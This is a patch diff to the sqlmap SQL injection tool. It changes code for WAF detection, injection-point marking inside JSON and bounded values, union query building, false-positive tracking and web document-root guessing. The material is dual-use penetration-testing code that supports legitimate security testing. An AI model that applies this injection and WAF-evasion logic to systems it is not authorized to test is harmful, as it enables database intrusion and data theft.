infoMsg += "'%s' might be vulnerable to file inclusion attacks" % parameter
|
||||
@@ -1013,12 +1059,22 @@ def checkDynamicContent(firstPage, secondPage):
|
||||
logger.critical(warnMsg)
|
||||
return
|
||||
|
||||
seqMatcher = getCurrentThreadData().seqMatcher
|
||||
seqMatcher.set_seq1(firstPage)
|
||||
seqMatcher.set_seq2(secondPage)
|
||||
if firstPage and secondPage and any(len(_) > MAX_DIFFLIB_SEQUENCE_LENGTH for _ in (firstPage, secondPage)):
|
||||
ratio = None
|
||||
else:
|
||||
try:
|
||||
seqMatcher = getCurrentThreadData().seqMatcher
|
||||
seqMatcher.set_seq1(firstPage)
|
||||
seqMatcher.set_seq2(secondPage)
|
||||
ratio = seqMatcher.quick_ratio()
|
||||
except MemoryError:
|
||||
ratio = None
|
||||
|
||||
if ratio is None:
|
||||
kb.skipSeqMatcher = True
|
||||
|
||||
# In case of an intolerable difference turn on dynamicity removal engine
|
||||
if seqMatcher.quick_ratio() <= UPPER_RATIO_BOUND:
|
||||
elif ratio <= UPPER_RATIO_BOUND:
|
||||
findDynamicContent(firstPage, secondPage)
|
||||
|
||||
count = 0
|
||||
@@ -1235,6 +1291,9 @@ def identifyWaf():
|
||||
if not conf.identifyWaf:
|
||||
return None
|
||||
|
||||
if not kb.wafFunctions:
|
||||
setWafFunctions()
|
||||
|
||||
kb.testMode = True
|
||||
|
||||
infoMsg = "using WAF scripts to detect "
|
||||
@@ -1276,7 +1335,7 @@ def identifyWaf():
|
||||
break
|
||||
|
||||
if retVal:
|
||||
errMsg = "WAF/IDS/IPS identified '%s'. Please " % retVal
|
||||
errMsg = "WAF/IDS/IPS identified as '%s'. Please " % retVal
|
||||
errMsg += "consider usage of tamper scripts (option '--tamper')"
|
||||
logger.critical(errMsg)
|
||||
|
||||
@@ -1287,7 +1346,7 @@ def identifyWaf():
|
||||
if output and output[0] not in ("Y", "y"):
|
||||
raise SqlmapUserQuitException
|
||||
else:
|
||||
warnMsg = "no WAF/IDS/IPS product has been identified (this doesn't mean that there is none)"
|
||||
warnMsg = "WAF/IDS/IPS product hasn't been identified"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
kb.testType = None
|
||||
@@ -1383,10 +1442,6 @@ def checkConnection(suppressOutput=False):
|
||||
else:
|
||||
kb.errorIsNone = True
|
||||
|
||||
if headers and headers.get("Server", "") == CLOUDFLARE_SERVER_HEADER:
|
||||
warnMsg = "CloudFlare response detected"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
except SqlmapConnectionException, ex:
|
||||
if conf.ipv6:
|
||||
warnMsg = "check connection to a provided "
|
||||
@@ -1415,3 +1470,6 @@ def checkConnection(suppressOutput=False):
|
||||
|
||||
def setVerbosity(): # Cross-linked function
|
||||
raise NotImplementedError
|
||||
|
||||
def setWafFunctions(): # Cross-linked function
|
||||
raise NotImplementedError
|
||||
|
||||
@@ -45,6 +45,7 @@ from lib.core.enums import CONTENT_TYPE
|
||||
from lib.core.enums import HASHDB_KEYS
|
||||
from lib.core.enums import HEURISTIC_TEST
|
||||
from lib.core.enums import HTTPMETHOD
|
||||
from lib.core.enums import NOTE
|
||||
from lib.core.enums import PAYLOAD
|
||||
from lib.core.enums import PLACE
|
||||
from lib.core.exception import SqlmapBaseException
|
||||
@@ -209,9 +210,8 @@ def _saveToHashDB():
|
||||
_[key].data.update(injection.data)
|
||||
hashDBWrite(HASHDB_KEYS.KB_INJECTIONS, _.values(), True)
|
||||
|
||||
_ = hashDBRetrieve(HASHDB_KEYS.KB_ABS_FILE_PATHS, True) or set()
|
||||
_.update(kb.absFilePaths)
|
||||
hashDBWrite(HASHDB_KEYS.KB_ABS_FILE_PATHS, _, True)
|
||||
_ = hashDBRetrieve(HASHDB_KEYS.KB_ABS_FILE_PATHS, True)
|
||||
hashDBWrite(HASHDB_KEYS.KB_ABS_FILE_PATHS, kb.absFilePaths | (_ if isinstance(_, set) else set()), True)
|
||||
|
||||
if not hashDBRetrieve(HASHDB_KEYS.KB_CHARS):
|
||||
hashDBWrite(HASHDB_KEYS.KB_CHARS, kb.chars, True)
|
||||
@@ -226,23 +226,23 @@ def _saveToResultsFile():
|
||||
results = {}
|
||||
techniques = dict(map(lambda x: (x[1], x[0]), getPublicTypeMembers(PAYLOAD.TECHNIQUE)))
|
||||
|
||||
for inj in kb.injections:
|
||||
if inj.place is None or inj.parameter is None:
|
||||
for injection in kb.injections + kb.falsePositives:
|
||||
if injection.place is None or injection.parameter is None:
|
||||
continue
|
||||
|
||||
key = (inj.place, inj.parameter)
|
||||
key = (injection.place, injection.parameter, ';'.join(injection.notes))
|
||||
if key not in results:
|
||||
results[key] = []
|
||||
|
||||
results[key].extend(inj.data.keys())
|
||||
results[key].extend(injection.data.keys())
|
||||
|
||||
for key, value in results.items():
|
||||
place, parameter = key
|
||||
line = "%s,%s,%s,%s%s" % (safeCSValue(kb.originalUrls.get(conf.url) or conf.url), place, parameter, "".join(map(lambda x: techniques[x][0].upper(), sorted(value))), os.linesep)
|
||||
place, parameter, notes = key
|
||||
line = "%s,%s,%s,%s,%s%s" % (safeCSValue(kb.originalUrls.get(conf.url) or conf.url), place, parameter, "".join(map(lambda x: techniques[x][0].upper(), sorted(value))), notes, os.linesep)
|
||||
conf.resultsFP.writelines(line)
|
||||
|
||||
if not results:
|
||||
line = "%s,,,%s" % (conf.url, os.linesep)
|
||||
line = "%s,,,,%s" % (conf.url, os.linesep)
|
||||
conf.resultsFP.writelines(line)
|
||||
|
||||
def start():
|
||||
@@ -464,7 +464,7 @@ def start():
|
||||
infoMsg = "skipping randomizing %s parameter '%s'" % (paramType, parameter)
|
||||
logger.info(infoMsg)
|
||||
|
||||
elif parameter in conf.skip:
|
||||
elif parameter in conf.skip or kb.postHint and parameter.split(' ')[-1] in conf.skip:
|
||||
testSqlInj = False
|
||||
|
||||
infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
|
||||
@@ -521,23 +521,30 @@ def start():
|
||||
|
||||
injection = checkSqlInjection(place, parameter, value)
|
||||
proceed = not kb.endDetection
|
||||
injectable = False
|
||||
|
||||
if injection is not None and injection.place is not None:
|
||||
kb.injections.append(injection)
|
||||
if getattr(injection, "place", None) is not None:
|
||||
if NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE in injection.notes:
|
||||
kb.falsePositives.append(injection)
|
||||
else:
|
||||
injectable = True
|
||||
|
||||
# In case when user wants to end detection phase (Ctrl+C)
|
||||
if not proceed:
|
||||
break
|
||||
kb.injections.append(injection)
|
||||
|
||||
msg = "%s parameter '%s' " % (injection.place, injection.parameter)
|
||||
msg += "is vulnerable. Do you want to keep testing the others (if any)? [y/N] "
|
||||
test = readInput(msg, default="N")
|
||||
# In case when user wants to end detection phase (Ctrl+C)
|
||||
if not proceed:
|
||||
break
|
||||
|
||||
if test[0] not in ("y", "Y"):
|
||||
proceed = False
|
||||
paramKey = (conf.hostname, conf.path, None, None)
|
||||
kb.testedParams.add(paramKey)
|
||||
else:
|
||||
msg = "%s parameter '%s' " % (injection.place, injection.parameter)
|
||||
msg += "is vulnerable. Do you want to keep testing the others (if any)? [y/N] "
|
||||
test = readInput(msg, default="N")
|
||||
|
||||
if test[0] not in ("y", "Y"):
|
||||
proceed = False
|
||||
paramKey = (conf.hostname, conf.path, None, None)
|
||||
kb.testedParams.add(paramKey)
|
||||
|
||||
if not injectable:
|
||||
warnMsg = "%s parameter '%s' is not " % (paramType, parameter)
|
||||
warnMsg += "injectable"
|
||||
logger.warn(warnMsg)
|
||||
@@ -586,24 +593,24 @@ def start():
|
||||
if not conf.string and not conf.notString and not conf.regexp:
|
||||
errMsg += " Also, you can try to rerun by providing "
|
||||
errMsg += "either a valid value for option '--string' "
|
||||
errMsg += "(or '--regexp')"
|
||||
errMsg += "(or '--regexp')."
|
||||
elif conf.string:
|
||||
errMsg += " Also, you can try to rerun by providing a "
|
||||
errMsg += "valid value for option '--string' as perhaps the string you "
|
||||
errMsg += "have chosen does not match "
|
||||
errMsg += "exclusively True responses"
|
||||
errMsg += "exclusively True responses."
|
||||
elif conf.regexp:
|
||||
errMsg += " Also, you can try to rerun by providing a "
|
||||
errMsg += "valid value for option '--regexp' as perhaps the regular "
|
||||
errMsg += "expression that you have chosen "
|
||||
errMsg += "does not match exclusively True responses"
|
||||
errMsg += "does not match exclusively True responses."
|
||||
|
||||
if not conf.tamper:
|
||||
errMsg += " If you suspect that there is some kind of protection mechanism "
|
||||
errMsg += "involved (e.g. WAF) maybe you could retry "
|
||||
errMsg += "with an option '--tamper' (e.g. '--tamper=space2comment')"
|
||||
|
||||
raise SqlmapNotVulnerableException(errMsg)
|
||||
raise SqlmapNotVulnerableException(errMsg.rstrip('.'))
|
||||
else:
|
||||
# Flush the flag
|
||||
kb.testMode = False
|
||||
@@ -652,6 +659,8 @@ def start():
|
||||
errMsg = getSafeExString(ex)
|
||||
|
||||
if conf.multipleTargets:
|
||||
_saveToResultsFile()
|
||||
|
||||
errMsg += ", skipping to the next %s" % ("form" if conf.forms else "URL")
|
||||
logger.error(errMsg)
|
||||
else:
|
||||
@@ -670,9 +679,10 @@ def start():
|
||||
if kb.dataOutputFlag and not conf.multipleTargets:
|
||||
logger.info("fetched data logged to text files under '%s'" % conf.outputPath)
|
||||
|
||||
if conf.multipleTargets and conf.resultsFilename:
|
||||
infoMsg = "you can find results of scanning in multiple targets "
|
||||
infoMsg += "mode inside the CSV file '%s'" % conf.resultsFilename
|
||||
logger.info(infoMsg)
|
||||
if conf.multipleTargets:
|
||||
if conf.resultsFilename:
|
||||
infoMsg = "you can find results of scanning in multiple targets "
|
||||
infoMsg += "mode inside the CSV file '%s'" % conf.resultsFilename
|
||||
logger.info(infoMsg)
|
||||
|
||||
return True
|
||||
|
||||
@@ -7,6 +7,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
|
||||
from lib.core.common import Backend
|
||||
from lib.core.data import conf
|
||||
from lib.core.data import kb
|
||||
from lib.core.data import logger
|
||||
from lib.core.dicts import DBMS_DICT
|
||||
from lib.core.enums import DBMS
|
||||
@@ -101,7 +102,10 @@ def setHandler():
|
||||
conf.dbmsConnector.connect()
|
||||
|
||||
if handler.checkDbms():
|
||||
conf.dbmsHandler = handler
|
||||
if kb.resolutionDbms:
|
||||
conf.dbmsHandler = max(_ for _ in items if _[0] == kb.resolutionDbms)[2]()
|
||||
else:
|
||||
conf.dbmsHandler = handler
|
||||
break
|
||||
else:
|
||||
conf.dbmsConnector = None
|
||||
|
||||
@@ -17,6 +17,7 @@ from lib.core.common import isTechniqueAvailable
|
||||
from lib.core.common import randomInt
|
||||
from lib.core.common import randomStr
|
||||
from lib.core.common import safeSQLIdentificatorNaming
|
||||
from lib.core.common import safeStringFormat
|
||||
from lib.core.common import singleTimeWarnMessage
|
||||
from lib.core.common import splitFields
|
||||
from lib.core.common import unArrayizeValue
|
||||
@@ -34,10 +35,12 @@ from lib.core.enums import PLACE
|
||||
from lib.core.enums import POST_HINT
|
||||
from lib.core.exception import SqlmapNoneDataException
|
||||
from lib.core.settings import BOUNDARY_BACKSLASH_MARKER
|
||||
from lib.core.settings import BOUNDED_INJECTION_MARKER
|
||||
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
||||
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
||||
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||
from lib.core.settings import GENERIC_SQL_COMMENT
|
||||
from lib.core.settings import NULL
|
||||
from lib.core.settings import PAYLOAD_DELIMITER
|
||||
from lib.core.settings import REPLACEMENT_MARKER
|
||||
from lib.core.unescaper import unescaper
|
||||
@@ -94,9 +97,12 @@ class Agent(object):
|
||||
paramDict = conf.paramDict[place]
|
||||
origValue = getUnicode(paramDict[parameter])
|
||||
|
||||
if place == PLACE.URI:
|
||||
if place == PLACE.URI or BOUNDED_INJECTION_MARKER in origValue:
|
||||
paramString = origValue
|
||||
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
|
||||
if place == PLACE.URI:
|
||||
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
|
||||
else:
|
||||
origValue = filter(None, (re.search(_, origValue.split(BOUNDED_INJECTION_MARKER)[0]) for _ in (r"\w+\Z", r"[^\"'><]+\Z", r"[^ ]+\Z")))[0].group(0)
|
||||
origValue = origValue[origValue.rfind('/') + 1:]
|
||||
for char in ('?', '=', ':'):
|
||||
if char in origValue:
|
||||
@@ -114,7 +120,7 @@ class Agent(object):
|
||||
elif place == PLACE.CUSTOM_HEADER:
|
||||
paramString = origValue
|
||||
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
|
||||
origValue = origValue[origValue.index(',') + 1:]
|
||||
origValue = origValue[origValue.find(',') + 1:]
|
||||
match = re.search(r"([^;]+)=(?P<value>[^;]+);?\Z", origValue)
|
||||
if match:
|
||||
origValue = match.group("value")
|
||||
@@ -160,6 +166,9 @@ class Agent(object):
|
||||
newValue = newValue.replace(CUSTOM_INJECTION_MARK_CHAR, REPLACEMENT_MARKER)
|
||||
retVal = paramString.replace(_, self.addPayloadDelimiters(newValue))
|
||||
retVal = retVal.replace(CUSTOM_INJECTION_MARK_CHAR, "").replace(REPLACEMENT_MARKER, CUSTOM_INJECTION_MARK_CHAR)
|
||||
elif BOUNDED_INJECTION_MARKER in paramDict[parameter]:
|
||||
_ = "%s%s" % (origValue, BOUNDED_INJECTION_MARKER)
|
||||
retVal = "%s=%s" % (re.sub(r" (\#\d\*|\(.+\))\Z", "", parameter), paramString.replace(_, self.addPayloadDelimiters(newValue)))
|
||||
elif place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):
|
||||
retVal = paramString.replace(origValue, self.addPayloadDelimiters(newValue))
|
||||
else:
|
||||
@@ -272,7 +281,7 @@ class Agent(object):
|
||||
where = kb.injection.data[kb.technique].where if where is None else where
|
||||
comment = kb.injection.data[kb.technique].comment if comment is None else comment
|
||||
|
||||
if Backend.getIdentifiedDbms() == DBMS.ACCESS and comment == GENERIC_SQL_COMMENT:
|
||||
if Backend.getIdentifiedDbms() == DBMS.ACCESS and any((comment or "").startswith(_) for _ in ("--", "[GENERIC_SQL_COMMENT]")):
|
||||
comment = queries[DBMS.ACCESS].comment.query
|
||||
|
||||
if comment is not None:
|
||||
@@ -295,7 +304,7 @@ class Agent(object):
|
||||
_ = (
|
||||
("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
|
||||
("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\
|
||||
("[HASH_REPLACE]", kb.chars.hash_),
|
||||
("[HASH_REPLACE]", kb.chars.hash_), ("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT)
|
||||
)
|
||||
payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload)
|
||||
|
||||
@@ -712,8 +721,11 @@ class Agent(object):
|
||||
|
||||
if conf.uFrom:
|
||||
fromTable = " FROM %s" % conf.uFrom
|
||||
else:
|
||||
fromTable = fromTable or FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), "")
|
||||
elif not fromTable:
|
||||
if kb.tableFrom:
|
||||
fromTable = " FROM %s" % kb.tableFrom
|
||||
else:
|
||||
fromTable = FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), "")
|
||||
|
||||
if query.startswith("SELECT "):
|
||||
query = query[len("SELECT "):]
|
||||
@@ -746,6 +758,9 @@ class Agent(object):
|
||||
intoRegExp = intoRegExp.group(1)
|
||||
query = query[:query.index(intoRegExp)]
|
||||
|
||||
position = 0
|
||||
char = NULL
|
||||
|
||||
for element in xrange(0, count):
|
||||
if element > 0:
|
||||
unionQuery += ','
|
||||
@@ -923,7 +938,7 @@ class Agent(object):
|
||||
else:
|
||||
limitedQuery = "%s FROM (SELECT %s,%s" % (untilFrom, ','.join(f for f in field), limitStr)
|
||||
|
||||
limitedQuery = limitedQuery % fromFrom
|
||||
limitedQuery = safeStringFormat(limitedQuery, (fromFrom,))
|
||||
limitedQuery += "=%d" % (num + 1)
|
||||
|
||||
elif Backend.isDbms(DBMS.MSSQL):
|
||||
@@ -984,12 +999,13 @@ class Agent(object):
|
||||
|
||||
def forgeQueryOutputLength(self, expression):
|
||||
lengthQuery = queries[Backend.getIdentifiedDbms()].length.query
|
||||
select = re.search("\ASELECT\s+", expression, re.I)
|
||||
selectTopExpr = re.search("\ASELECT\s+TOP\s+[\d]+\s+(.+?)\s+FROM", expression, re.I)
|
||||
select = re.search(r"\ASELECT\s+", expression, re.I)
|
||||
selectTopExpr = re.search(r"\ASELECT\s+TOP\s+[\d]+\s+(.+?)\s+FROM", expression, re.I)
|
||||
selectMinMaxExpr = re.search(r"\ASELECT\s+(MIN|MAX)\(.+?\)\s+FROM", expression, re.I)
|
||||
|
||||
_, _, _, _, _, _, fieldsStr, _ = self.getFields(expression)
|
||||
|
||||
if selectTopExpr:
|
||||
if selectTopExpr or selectMinMaxExpr:
|
||||
lengthExpr = lengthQuery % ("(%s)" % expression)
|
||||
elif select:
|
||||
lengthExpr = expression.replace(fieldsStr, lengthQuery % fieldsStr, 1)
|
||||
|
||||
@@ -15,6 +15,7 @@ import os
|
||||
import sys
|
||||
import tempfile
|
||||
|
||||
from lib.core.enums import MKSTEMP_PREFIX
|
||||
from lib.core.exception import SqlmapSystemException
|
||||
from lib.core.settings import BIGARRAY_CHUNK_SIZE
|
||||
|
||||
@@ -91,7 +92,7 @@ class BigArray(list):
|
||||
|
||||
def _dump(self, chunk):
|
||||
try:
|
||||
handle, filename = tempfile.mkstemp()
|
||||
handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.BIG_ARRAY)
|
||||
self.filenames.add(filename)
|
||||
os.close(handle)
|
||||
with open(filename, "w+b") as fp:
|
||||
|
||||
@@ -72,6 +72,7 @@ from lib.core.enums import EXPECTED
|
||||
from lib.core.enums import HEURISTIC_TEST
|
||||
from lib.core.enums import HTTP_HEADER
|
||||
from lib.core.enums import HTTPMETHOD
|
||||
from lib.core.enums import MKSTEMP_PREFIX
|
||||
from lib.core.enums import OS
|
||||
from lib.core.enums import PLACE
|
||||
from lib.core.enums import PAYLOAD
|
||||
@@ -91,6 +92,7 @@ from lib.core.log import LOGGER_HANDLER
|
||||
from lib.core.optiondict import optDict
|
||||
from lib.core.settings import BANNER
|
||||
from lib.core.settings import BOLD_PATTERNS
|
||||
from lib.core.settings import BOUNDED_INJECTION_MARKER
|
||||
from lib.core.settings import BRUTE_DOC_ROOT_PREFIXES
|
||||
from lib.core.settings import BRUTE_DOC_ROOT_SUFFIXES
|
||||
from lib.core.settings import BRUTE_DOC_ROOT_TARGET_MARK
|
||||
@@ -102,6 +104,7 @@ from lib.core.settings import DEFAULT_MSSQL_SCHEMA
|
||||
from lib.core.settings import DUMMY_USER_INJECTION
|
||||
from lib.core.settings import DYNAMICITY_MARK_LENGTH
|
||||
from lib.core.settings import ERROR_PARSING_REGEXES
|
||||
from lib.core.settings import FILE_PATH_REGEXES
|
||||
from lib.core.settings import FORCE_COOKIE_EXPIRATION_TIME
|
||||
from lib.core.settings import FORM_SEARCH_REGEX
|
||||
from lib.core.settings import GENERIC_DOC_ROOT_DIRECTORY_NAMES
|
||||
@@ -128,6 +131,7 @@ from lib.core.settings import PARTIAL_VALUE_MARKER
|
||||
from lib.core.settings import PAYLOAD_DELIMITER
|
||||
from lib.core.settings import PLATFORM
|
||||
from lib.core.settings import PRINTABLE_CHAR_REGEX
|
||||
from lib.core.settings import PUSH_VALUE_EXCEPTION_RETRY_COUNT
|
||||
from lib.core.settings import PYVERSION
|
||||
from lib.core.settings import REFERER_ALIASES
|
||||
from lib.core.settings import REFLECTED_BORDER_REGEX
|
||||
@@ -150,6 +154,7 @@ from lib.core.threads import getCurrentThreadData
|
||||
from lib.utils.sqlalchemy import _sqlalchemy
|
||||
from thirdparty.clientform.clientform import ParseResponse
|
||||
from thirdparty.clientform.clientform import ParseError
|
||||
from thirdparty.colorama.initialise import init as coloramainit
|
||||
from thirdparty.magic import magic
|
||||
from thirdparty.odict.odict import OrderedDict
|
||||
from thirdparty.termcolor.termcolor import colored
|
||||
@@ -301,7 +306,7 @@ class Backend:
|
||||
|
||||
# Little precaution, in theory this condition should always be false
|
||||
elif kb.dbms is not None and kb.dbms != dbms:
|
||||
warnMsg = "there seems to be a high probability that "
|
||||
warnMsg = "there appears to be a high probability that "
|
||||
warnMsg += "this could be a false positive case"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
@@ -315,6 +320,8 @@ class Backend:
|
||||
_ = readInput(msg, default=kb.dbms)
|
||||
|
||||
if aliasToDbmsEnum(_) == kb.dbms:
|
||||
kb.dbmsVersion = []
|
||||
kb.resolutionDbms = kb.dbms
|
||||
break
|
||||
elif aliasToDbmsEnum(_) == dbms:
|
||||
kb.dbms = aliasToDbmsEnum(_)
|
||||
@@ -578,7 +585,7 @@ def paramToDict(place, parameters=None):
|
||||
if not conf.multipleTargets and not (conf.csrfToken and parameter == conf.csrfToken):
|
||||
_ = urldecode(testableParameters[parameter], convall=True)
|
||||
if (_.endswith("'") and _.count("'") == 1
|
||||
or re.search(r'\A9{3,}', _) or re.search(DUMMY_USER_INJECTION, _))\
|
||||
or re.search(r'\A9{3,}', _) or re.search(r'\A-\d+\Z', _) or re.search(DUMMY_USER_INJECTION, _))\
|
||||
and not parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX):
|
||||
warnMsg = "it appears that you have provided tainted parameter values "
|
||||
warnMsg += "('%s') with most probably leftover " % element
|
||||
@@ -597,27 +604,78 @@ def paramToDict(place, parameters=None):
|
||||
warnMsg += "so sqlmap could be able to run properly"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if conf.testParameter and not testableParameters:
|
||||
paramStr = ", ".join(test for test in conf.testParameter)
|
||||
if place in (PLACE.POST, PLACE.GET):
|
||||
for regex in (r"\A((?:<[^>]+>)+\w+)((?:<[^>]+>)+)\Z", r"\A([^\w]+.*\w+)([^\w]+)\Z"):
|
||||
match = re.search(regex, testableParameters[parameter])
|
||||
if match:
|
||||
try:
|
||||
candidates = OrderedDict()
|
||||
|
||||
if len(conf.testParameter) > 1:
|
||||
warnMsg = "provided parameters '%s' " % paramStr
|
||||
warnMsg += "are not inside the %s" % place
|
||||
logger.warn(warnMsg)
|
||||
else:
|
||||
parameter = conf.testParameter[0]
|
||||
def walk(head, current=None):
|
||||
current = current or head
|
||||
if isListLike(current):
|
||||
for _ in current:
|
||||
walk(head, _)
|
||||
elif isinstance(current, dict):
|
||||
for key in current.keys():
|
||||
value = current[key]
|
||||
if isinstance(value, (list, tuple, set, dict)):
|
||||
walk(head, value)
|
||||
elif isinstance(value, (bool, int, float, basestring)):
|
||||
original = current[key]
|
||||
if isinstance(value, bool):
|
||||
current[key] = "%s%s" % (str(value).lower(), BOUNDED_INJECTION_MARKER)
|
||||
else:
|
||||
current[key] = "%s%s" % (value, BOUNDED_INJECTION_MARKER)
|
||||
candidates["%s (%s)" % (parameter, key)] = json.dumps(deserialized)
|
||||
current[key] = original
|
||||
|
||||
if not intersect(USER_AGENT_ALIASES + REFERER_ALIASES + HOST_ALIASES, parameter, True):
|
||||
debugMsg = "provided parameter '%s' " % paramStr
|
||||
debugMsg += "is not inside the %s" % place
|
||||
logger.debug(debugMsg)
|
||||
deserialized = json.loads(testableParameters[parameter])
|
||||
walk(deserialized)
|
||||
|
||||
elif len(conf.testParameter) != len(testableParameters.keys()):
|
||||
for parameter in conf.testParameter:
|
||||
if parameter not in testableParameters:
|
||||
debugMsg = "provided parameter '%s' " % parameter
|
||||
debugMsg += "is not inside the %s" % place
|
||||
logger.debug(debugMsg)
|
||||
if candidates:
|
||||
message = "it appears that provided value for %s parameter '%s' " % (place, parameter)
|
||||
message += "is JSON deserializable. Do you want to inject inside? [y/N] "
|
||||
test = readInput(message, default="N")
|
||||
if test[0] in ("y", "Y"):
|
||||
del testableParameters[parameter]
|
||||
testableParameters.update(candidates)
|
||||
break
|
||||
except (KeyboardInterrupt, SqlmapUserQuitException):
|
||||
raise
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
_ = re.sub(regex, "\g<1>%s\g<%d>" % (CUSTOM_INJECTION_MARK_CHAR, len(match.groups())), testableParameters[parameter])
|
||||
message = "it appears that provided value for %s parameter '%s' " % (place, parameter)
|
||||
message += "has boundaries. Do you want to inject inside? ('%s') [y/N] " % _
|
||||
test = readInput(message, default="N")
|
||||
if test[0] in ("y", "Y"):
|
||||
testableParameters[parameter] = re.sub(regex, "\g<1>%s\g<2>" % BOUNDED_INJECTION_MARKER, testableParameters[parameter])
|
||||
break
|
||||
|
||||
if conf.testParameter:
|
||||
if not testableParameters:
|
||||
paramStr = ", ".join(test for test in conf.testParameter)
|
||||
|
||||
if len(conf.testParameter) > 1:
|
||||
warnMsg = "provided parameters '%s' " % paramStr
|
||||
warnMsg += "are not inside the %s" % place
|
||||
logger.warn(warnMsg)
|
||||
else:
|
||||
parameter = conf.testParameter[0]
|
||||
|
||||
if not intersect(USER_AGENT_ALIASES + REFERER_ALIASES + HOST_ALIASES, parameter, True):
|
||||
debugMsg = "provided parameter '%s' " % paramStr
|
||||
debugMsg += "is not inside the %s" % place
|
||||
logger.debug(debugMsg)
|
||||
|
||||
elif len(conf.testParameter) != len(testableParameters.keys()):
|
||||
for parameter in conf.testParameter:
|
||||
if parameter not in testableParameters:
|
||||
debugMsg = "provided parameter '%s' " % parameter
|
||||
debugMsg += "is not inside the %s" % place
|
||||
logger.debug(debugMsg)
|
||||
|
||||
if testableParameters:
|
||||
for parameter, value in testableParameters.items():
|
||||
@@ -627,7 +685,7 @@ def paramToDict(place, parameters=None):
|
||||
decoded = value.decode(encoding)
|
||||
if len(decoded) > MIN_ENCODED_LEN_CHECK and all(_ in string.printable for _ in decoded):
|
||||
warnMsg = "provided parameter '%s' " % parameter
|
||||
warnMsg += "seems to be '%s' encoded" % encoding
|
||||
warnMsg += "appears to be '%s' encoded" % encoding
|
||||
logger.warn(warnMsg)
|
||||
break
|
||||
except:
|
||||
@@ -637,8 +695,6 @@ def paramToDict(place, parameters=None):
|
||||
|
||||
def getManualDirectories():
|
||||
directories = None
|
||||
pagePath = directoryPath(conf.path)
|
||||
|
||||
defaultDocRoot = DEFAULT_DOC_ROOTS.get(Backend.getOs(), DEFAULT_DOC_ROOTS[OS.LINUX])
|
||||
|
||||
if kb.absFilePaths:
|
||||
@@ -656,18 +712,18 @@ def getManualDirectories():
|
||||
windowsDriveLetter, absFilePath = absFilePath[:2], absFilePath[2:]
|
||||
absFilePath = ntToPosixSlashes(posixToNtSlashes(absFilePath))
|
||||
|
||||
if any("/%s/" % _ in absFilePath for _ in GENERIC_DOC_ROOT_DIRECTORY_NAMES):
|
||||
for _ in GENERIC_DOC_ROOT_DIRECTORY_NAMES:
|
||||
_ = "/%s/" % _
|
||||
for _ in list(GENERIC_DOC_ROOT_DIRECTORY_NAMES) + [conf.hostname]:
|
||||
_ = "/%s/" % _
|
||||
|
||||
if _ in absFilePath:
|
||||
directories = "%s%s" % (absFilePath.split(_)[0], _)
|
||||
break
|
||||
if _ in absFilePath:
|
||||
directories = "%s%s" % (absFilePath.split(_)[0], _)
|
||||
break
|
||||
|
||||
if pagePath and pagePath in absFilePath:
|
||||
directories = absFilePath.split(pagePath)[0]
|
||||
if windowsDriveLetter:
|
||||
directories = "%s/%s" % (windowsDriveLetter, ntToPosixSlashes(directories))
|
||||
if not directories and conf.path.strip('/') and conf.path in absFilePath:
|
||||
directories = absFilePath.split(conf.path)[0]
|
||||
|
||||
if directories and windowsDriveLetter:
|
||||
directories = "%s/%s" % (windowsDriveLetter, ntToPosixSlashes(directories))
|
||||
|
||||
directories = normalizePath(directories)
|
||||
|
||||
@@ -675,7 +731,7 @@ def getManualDirectories():
|
||||
infoMsg = "retrieved the web server document root: '%s'" % directories
|
||||
logger.info(infoMsg)
|
||||
else:
|
||||
warnMsg = "unable to retrieve automatically the web server "
|
||||
warnMsg = "unable to automatically retrieve the web server "
|
||||
warnMsg += "document root"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
@@ -714,9 +770,14 @@ def getManualDirectories():
|
||||
|
||||
for suffix in BRUTE_DOC_ROOT_SUFFIXES:
|
||||
for target in targets:
|
||||
item = "%s/%s" % (prefix, suffix)
|
||||
if not prefix.endswith("/%s" % suffix):
|
||||
item = "%s/%s" % (prefix, suffix)
|
||||
else:
|
||||
item = prefix
|
||||
|
||||
item = item.replace(BRUTE_DOC_ROOT_TARGET_MARK, target).replace("//", '/').rstrip('/')
|
||||
directories.append(item)
|
||||
if item not in directories:
|
||||
directories.append(item)
|
||||
|
||||
if BRUTE_DOC_ROOT_TARGET_MARK not in prefix:
|
||||
break
|
||||
@@ -870,7 +931,6 @@ def dataToDumpFile(dumpFile, data):
|
||||
else:
|
||||
raise
|
||||
|
||||
|
||||
def dataToOutFile(filename, data):
|
||||
retVal = None
|
||||
|
||||
@@ -878,8 +938,8 @@ def dataToOutFile(filename, data):
|
||||
retVal = os.path.join(conf.filePath, filePathToSafeString(filename))
|
||||
|
||||
try:
|
||||
with open(retVal, "w+b") as f:
|
||||
f.write(data)
|
||||
with open(retVal, "w+b") as f: # has to stay as non-codecs because data is raw ASCII encoded data
|
||||
f.write(unicodeencode(data))
|
||||
except IOError, ex:
|
||||
errMsg = "something went wrong while trying to write "
|
||||
errMsg += "to the output file ('%s')" % getSafeExString(ex)
|
||||
@@ -949,9 +1009,13 @@ def readInput(message, default=None, checkBatch=True):
|
||||
retVal = raw_input() or default
|
||||
